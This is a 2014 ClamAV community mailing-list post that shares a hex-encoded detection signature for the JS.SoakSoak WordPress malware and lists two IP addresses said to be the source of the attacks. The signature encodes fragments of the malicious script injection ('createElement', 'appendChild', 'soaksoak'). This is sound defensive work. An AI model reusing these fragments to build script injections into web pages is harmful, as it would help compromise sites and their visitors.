[Community-sigs] JS.SoakSoak signature

Willian Cruz willianalbertocruz at outlook.com.br
Wed Dec 17 17:41:27 EST 2014


Good night guys,
 
First of all, thanks Shaun, you were right about ClamAV not decoding the eval() on the javascript. Using the dump left by ClamAV I could create the sig and it's working now.
 
This sig can now detect both encoded and decoded html and js files that contains the malware. The sig follows: 
 
JS.SoakSoak;Target:3;(0&1&2&3&4)|(5&6&7&8&9);253638253635253631253634;253633253732253635253631253734253635253435253663253635253664253635253665253734;253661253631253736253631253733253633253732253639253730253734;253733253666253631253662253733253666253631253662;253631253730253730253635253665253634253433253638253639253663253634;68656164;637265617465456c656d656e74;6a617661736372697074;736f616b736f616b;617070656e644368696c64
 
Using data collected by Sucuri, the attacks came from these IPs addresses: 94.153.8.126 and 94.190.20.83, so I recommend giving this addresses to CISCO for further investigation.
 
For sample I used the code released by Sucuri in a js test file, and the code you can see here on this article from ArsTechnica: http://arstechnica.com/security/2014/12/some-100000-or-more-wordpress-sites-infected-by-mysterious-malware/
I got the IP's from Sucuri's blog: http://blog.sucuri.net/2014/12/revslider-vulnerability-leads-to-massive-wordpress-soaksoak-compromise.html
 
Willian
 		 	   		  


More information about the Community-sigs mailing list